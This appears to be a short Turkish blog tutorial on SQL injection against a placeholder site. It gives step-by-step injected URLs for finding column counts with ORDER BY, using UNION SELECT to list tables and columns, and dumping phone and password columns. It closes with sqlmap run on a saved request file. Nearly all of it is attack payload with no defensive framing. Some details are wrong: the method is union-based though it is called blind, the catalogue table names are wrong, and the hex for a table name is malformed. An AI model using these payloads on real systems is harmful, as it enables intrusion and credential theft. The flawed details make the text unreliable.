Kör Sql Injection Nedir? (Blind)

Kör Sql Injection Nedir? (Blind)

1=0 1=2 4=3 gibi eşitlik olmayan değerler verildiğinde sitenin verdiği hata ya da sayfadaki değişmelere dayanarak işleme devam eder.
Örnek url www.test.com/test.php?id=1’and 1=2
Bu url 1=2 şeklinde bir eşitlik false olduğundan hata verecek ya da sayfadaki değişimler sonucunda bilği vercek verecektir.

Manuel Yapımı
Kolon Sayısı Tespiti

Kolon Sayısını Bulurken Sayfa Değişkliğini Kullanacağız. And “1=1” Order+By Order+By+1 Sondaki Sayıyı +1 Şeklinde Birer Birer Artırıyoruz Sayfa Değişinceye Kadar.Burada Kolon Sayısını Hangi Sayıda Sayfa Değiştiğinden Anlayacağız.


www.test.com/test.php?id=1+and+1=1+order+by+1


Sorgu Oluşturma

Burada 1=1 Eşitlik Yerine 1=0 Eşitsizliği Kullanacaz.1=0′ sonra “union+select+0,1,2,3” Yazıyoruz.2 Numarayı Kullanacağız


www.test.com/test.php?id=1+and+1=0+union+select+0,1,2,3



Tablo Çekimi

Tablo Çekimi İçin 2 Numaralı Kolon Sayısını Kullancaz


www.test.com/test.php?id=1+and+1=1+union+select+0,1,group_concat(table_name),3+from+test_db.tables



Tablo Veri Çekimi

Normal Sql Gibi Bunuda Öyle Yapacağız Ama Tablo Adını Hexleme Yapmamız Gerektir Ben Örnek Olarak Hakan Tablosunu Çekcem Ve Bunun Hex Değerine Bakalım “68616b616e6e” Burdan Rahatca Bakabilirsiniz


www.test.com/test.php?id=1+and+1=1+union+select+0,1,group_concat(column_name),3+from+test_db.columns+where+table_name=’68616b616e6e



Kolon Veri Çekimi

Hakan Tablosundan Tel Ve Şifre Kolonları Çıktı. Tel Ve Şifre Kolonlarının Değerlerini Öğrenelim.Veriler Karışmasın Diye Kolonlar Arasında “0x3a” Kodunu Ekliyoruz.



www.test.com/test.php?id=1+and+1=1+union+select+0,1,concat(Tel,0x3a,Şifre),3+from+hakan

Sqlmap İle İnj





İstek Dosyası İle Sqlmap Kullanarak İnjection İşlemi Yapacaz Kullandığınız Web Scanner Aracından İstek Bilgilerini Alıyorsunuz.


GET http://test.com/test.php?id=1 HTTP/1.1
Host: test.com
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4

txt İçine Yazarak 1.txt Olarak Kayıt Yapıp Sqlmap Klasör İçine Atalım sqlmap -r 1.txt –dbs Yazarak İşleme Devam Edebilirsiniz.